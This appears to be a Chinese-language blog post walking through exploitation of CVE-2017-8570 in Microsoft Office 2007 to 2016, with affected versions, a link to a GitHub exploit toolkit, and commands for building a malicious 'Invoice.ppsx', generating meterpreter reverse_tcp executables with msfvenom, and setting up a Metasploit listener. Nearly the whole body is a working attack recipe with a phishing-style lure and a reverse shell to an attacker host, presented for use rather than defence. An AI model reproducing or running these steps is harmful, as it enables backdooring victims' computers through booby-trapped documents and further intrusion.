影响版本

Microsoft Office 2007 Service Pack 3
Microsoft Office 2010 Service Pack 2 (32-bit editions)
Microsoft Office 2010 Service Pack 2 (64-bit editions)
Microsoft Office 2013 RT Service Pack 1
Microsoft Office 2013 Service Pack 1 (32-bit editions)
Microsoft Office 2013 Service Pack 1 (64-bit editions)
Microsoft Office 2016 (32-bit edition)
Microsoft Office 2016 (64-bit edition)

危害:
攻击者利用生成的exp之后可以监听到用户点击恶意文档之后的后门,从而进行深一步的渗透。
github exp 地址
https://github.com/tezukanice/Office8570.git
Office8570
博客也放了一个


具体实现方法
1.生成恶意文件
python cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx -u http://反弹回来ip/logo.doc

2.生成反弹shell的EXE文件
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe

32位系统跟64位系统 不能使用一个生成
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe

利用exp自带的进行监听
python cve-2017-8570_toolkit.py -M exp -e http://ip/shell.exe -l shell.exe 这个时候要注意服务器上的80端口是否被其他端口占用,防止监听不成功

msfconsole 的监听
msf > use exploit/multi/handler 
msf > set LHOST ip
msf > set LPORT port
msf > set PAYLOAD windows/meterpreter/reverse_tcp or msf > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf > exploit


发表评论

电子邮件地址不会被公开。 必填项已用*标注